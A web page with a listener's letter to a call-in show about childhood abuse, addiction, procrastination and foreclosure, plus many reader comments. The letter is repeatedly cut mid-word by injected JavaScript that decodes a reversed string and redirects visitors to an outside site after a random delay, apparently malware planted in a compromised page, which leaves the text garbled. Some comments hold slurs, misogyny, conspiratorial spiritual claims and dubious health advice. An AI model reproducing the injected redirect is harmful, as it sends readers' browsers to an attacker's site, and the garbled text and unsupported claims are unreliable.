"Weed, Addiction, Procrastination! HELP, STEFAN!" Freedomain Call In Show

Hello Stefan,

My name is [X], I was sexually abused as a kid and also an abuser as a kid and I’m 23, and just now accepting the reality of my past.

To this day I feel like it’s something that’s been holding me back but i cant exactly identify what it is, I suffer from p*rn addiction as well and I have suffered from it for 3-4 or maybe 5-6 years, I cant exactly say.

Currently am quitting weed but i used toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to smoke daily. I feel like i repressed so much trauma that it’s A: hindering me from moving on, or B:; stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topping me from making rational decisions in my life, I have a house that’s going intoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to foreclosure and I’m out of work right now. I do have opportunities lined up but I’m perfectly content with sitting around doing nothing, until sh*t hits the fan. I feel like i often force myself intoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to fight or flight reactions toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to move on with my life., Ex. I would lose my job toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to see the value of money, which would make me work harder in other ventures.

I feel like I suffer from a false pride whereas how I actually feel about myself no one actually understands, nor agree and often say I’m toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}too harsh on myself. I’ve been watching your show for a little while off and on, So I’ve halfheartedly spent 5-6 years trying toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to figure out who i am. Yet i still don’t know. I’M worried that i’m gonna voluntarily ruin my life because logic and practically shows that if i don’t make the correct changes within myself that my life will be that of a homeless man Stef.

I don’t have any direction in my life even tho i think i kinda know what i want toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to do. I just feel like my entire life is out of control.

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45 thoughts on “"Weed, Addiction, Procrastination! HELP, STEFAN!" Freedomain Call In Show”

  1. blahblahwhatever blah says:

    He's 23. He's got more than enough self knowledge to turn his life around.

  2. Prometheus says:

    The sound quality (the caller's) is ATROCIOUS!

  3. skeetuschrist says:

    "bro get the fuck out the bed"

  4. Megas Pantelos says:

    He sounds like Vin Diesel.

    Except for the abuse of the word “like“. That‘s not Dieselish…

  5. David Brady says:

    This was interesting, except this guy said like too many times, and I had to bail out.

  6. Drop Forged says:

    This guy needs Jesus or, at the least, Jordan Peterson.

  7. ruslas zubres says:

    chlamydiae is problematic. Most people will not have symptomatic and won't know they infected.
    But i'm not taking responsibility from them.
    The only way to get it is to do unprotected sex without cleaning yourself before and all.
    Good news, its treated with antibiotics pretty well

  8. Luca de Clippelaar says:

    Hey Stefan Molyneux,
    could you make a video about Imannuel Kant or Hegel?
    thanks for the video's

  9. myboythom says:

    Totally understand the dude when he talks about putting things off one should be doing and putting it off for no sensible and rational reason. It's almost like deliberate self sabotage. I suffer this myself and it is ruining a lot of my existence.
    There's no good reason to hang your bad decisions on and you kick yourself for not attending to whatever "IT " is when you should and then these bad decisions all roll up into a bigger problem.
    I suffer a lot from this myself and it is hard to put a finger on why you are just putting off….
    This dudes issues are really speaking to some of my own and the anxiety and stress I give myself because of not just doing things even the most rudimentary of tasks man it's debilitating

  10. Jude Sheckelberg says:

    I wonder what his IQ is…also, never say oral and sprinkles in the same sentence.

  11. castirondude says:

    "Stop pushing yourself" — Many people have the same issue. That's why it feels so liberating to enter a new environment (travel, new job, new home, etc), because you're away from all the "must do's" of your normal daily life. If you can liberate yourself from all the "must do's" and do the things you are truly passionate about , then life will be so much more pleasant. "Must do's" will never quite go away but they become a minor obstacle when there is a "want to do" behind them.

  12. BumpOnALog says:

    Question: are there more call in shows on subscribe star? It's my favorite content and I'd be willing to pay to have access to more of them.

  13. 2014kaydee says:

    Around 8:50 this gets hard to listen to. The detail…

  14. Mark Derksen says:

    Philosophical materialism can not help. You need to conceive spiritually to understand how pedophilia produces the consequences that it does. I was getting sodomized when I was 8. I have the same problems. That stuff infects you with shit that steals ur energy and controls you. U gotta do energy enhancement. But its hard; that shit does a good job of stopping you from doing energy enhanvement.

  15. Matthieu Simard says:

    What about honey addiction? Or scratching addiction… Or chewing on nails addiction? Weed isn't addictive. Quitting weed is as easy as buying a nail clipper or a box of stevia. Even easier: it's free.

  16. Matty B says:

    Still think marijuana’s are safe??

  17. Pod says:

    Guy shouldn't beat himself up so much over not implementing this stuff sooner. Implementing philosophy and pursuing self knowledge is quite possibly the hardest battle a person can take on in the history of humanity. People think their subconscious is something they can dive into and fix up in a month or so. It's more like the Marina Trench where its depths are unknown and it can take years to get a workable portion back into shape. Any time you fuck up and wanna self attack for whatever mistakes or slip ups you have, just remember you're fighting the machine of evil that's enslaved humanity forever and there's no strategy guide (besides some FDR stuff).

  18. Chris Skielnik says:

    Weed is currently massively over-rated and most people would do better abstaining completely IMHO. I've had some good experiences, but at most it's something that you should maybe use a couple of times a year. Those that use it week to week or day to day are largely kidding themselves that they're using medicine, when actually they're just addicted to a drug.

  19. Jason Case says:

    Great vid Stef. Inspiring.

  20. Heisenberg J says:

    So does Stef think peope owe society something, or doesnt?

  21. blkctthwt says:

    I was going to say something bellicose and likely unproductive, but I think I'll just thank Stefan for the entertainment instead. Thanks Stefan!

  22. DK Durham says:

    Clever advice from Stefan. Start with the premise he doesn't have to do shit. Then he is operating from free will, not reacting from self guilt. This guy seems like a really good guy with much potential once he corrects this issue. I predict he will overcome it and be surprised at how well he does.

  23. Devin Nickle says:

    Marijuana makes you stupid. Believe me, I tried it for decades. I have my problems with alcohol, but I don't have a two week hangover from it.

  24. Devin Nickle says:

    Bless you. Many are victims of violence. It doesn't mean the end of your life. ❤

  25. T RSCN says:

    Why haven’t I seen any of your videos in my recommended videos????

  26. Daniel Braun says:

    Weed and porn addiction definitely go hand in hand.

  27. Anonymous says:

    LOW IMPULSE CONTROL! Let’s bring in more of these people. Open Borders!

  28. Bloodsaber64 says:

    I know I am addicted to video games in some of the same ways, but why would I want to stop? Theres nothing in life worth not disappearing for. Society is shit, government's a mess and women are unloving cunts.

  29. Argyro Demoirakou says:

    Quit weed first to clear your brain then start the healing and everything will fall in place …god helps too

  30. Satan Lucifer says:

    I have smoked weed on and off all my life if your having trouble it's not the weed you have something else going on don't blame the weed it's obvious this guy has other problems

  31. david195335 says:

    Great vid. Best of luck to the guy. Can relate w the procrastination honestly and Stefan has great points and ideas on how to self motivate. And yea him saying “like” so many times made it hard to focus because it got pretty annoying but I don’t mean that in a mean way.

  32. Nah says:

    Ayahuasca, other ceremonial shamanic plants and psychedelic drugs are high risk behaviors that invite Attachments, Addiction Webbing and Possession for human beings on the planet during the Ascension Cycle at this time.

    Ayahuasca plant spirit has been hijacked by many of the dark avatars and the consortium of NAA entities that are on this planet during the Ascension Cycle looking to harvest Soul bodies and the possibility to take over the physical body.

    It is designed to interfere with true spiritual communication links and shut off the neurological communication functions between the persons consciousness and their higher spirit. It will install its own software programs to run the body, and brain in the autonomic functions of the Central Nervous System. It is usually an astral enlightenment program to trick the person into believing their artificially induced spiritual and altered consciousness state is real. The Ayahuasca plant is connected to a massive spirit, that has grown in size from many people being falsely lead on this path and taking it at high quantities during this time. The design of this plant ceremony in most common cases, is that the spirit of the plant is manipulated by negative forces that want the original consciousness of the person taking the drug to leave the body and/or change Timelines. The goal for the Imposter Spirit that want to take over the human body either in the current time, or in the future timelines, use the Ayahuasca plant to act as its conduit and dark portal opening to allow access into the inner spiritual sanctum of that person.

    From a higher perspective, Ayahuasca should be avoided and steps taken to understand its true energetic signature and know who is behind its aggressive promotion in the spiritual communities.

  33. Pink Fanta says:

    he's very self-aware for his age. He can do great things if he gets healing and takes action.

  34. Alan Erkkila says:

    Thank god he's doing something about this now! I didn't expect his story to so closely match mine… But I managed to muddle along the lower rungs of life until I blew up. I can't stand taking orders either. Now I have to learn not to be my own angry dad/boss/spouse. I still have a decade or two to contribute.

  35. Ashley Reyes says:

    Stefans analogy’s are always so great. I wish I had that skill when talking to people.

  36. Julius says:

    Stefan, I wish I had the courage to talk to someone about this when I was 23. My story is dangerously similar to his in fact. I'm 28 now but brother I thank you for uploading this video and I praise this gentleman for having the courage to tell you such a story. I felt like I just listened to a 23 year old version of myself haha! This gives me the courage to be more open to my therapist in the future. Keep up the good work Stefan. You are the man!!

  37. Paul B says:

    I need some weed right now.

  38. Suffer No Fools says:


    "What the fuck indeed."

  39. Kamehamedouken says:

    I do as little as I have to to not be homeless or be a burden on my friends and family. Those are also my only motives for even doing this much. Down at my core? I haven't wanted to live for 23 years. And I'm not sure how to change that.

  40. anniewoodfin77 says:

    So much compassion for this caller. Sexual abuse is beyond destructive. This guys seriously has balls to talk about this stuff.

  41. Westy says:

    Although the word "like" has grown to be a sentence crutch in this era much to my disdain, I can't help but blame environmental factors and media that puts a hindrance on language skills. It's great he's still self aware and is taking the initiative to seek help after suffering in silence. Even someone expressing the slightest bit of sympathy can start to boost attitudes and give them inner light. He'll pull through, we all will.

  42. peemic12 says:

    Good luck caller. You have the right stuff! You can do it!

  43. BOtt says:

    Procrastination is a major problem I have when I smoke as well. I think that's normal for potheads.

  44. Go Togi says:

    Hey may I raise awareness with you on something? In my country, Romania, they put a system in place to control the quality of life, they said it increases it but if you disagree with them they actively decrease it, it's called the coward system and rejecting it makes you their lamb to serve as a negative example for a lifetime. I had some gay experiences when I was younger, sex. I was bi but now I'm just straight and I'm now suffering some repercussions. They call "the coward" everyone who doesn't want to get maried. The punishment for it is constant ridicule for a lifetime, and constant means constant, my rights were removed from me I'm now the towns fool. I'm subjected to this and everyone is told to tell me I have hallucinations if I confront them, ofcourse they insult me back and forth before this line of theirs, in my face with everyone else having a blast. My family agrees with my harassers and I'm living a nightmare for some time now, I've changed cities multiple times and I'm almost out of money. I've been locked up for slapping people and once for getting in a fight because of it. I've been beaten for spitting and treated with light violence for giving lip, if I disagree with them they say I see everything through a lense of hatred. My lawyer said it's only marginalization if they do it because I'm from a particular group of people. I need a means to resist this but I don't have the brains, do you know anyone that you can point me to? Sorry to be a bother, I need two surgeries already and I need to fight this off fast because I'm colapsing under preasure.

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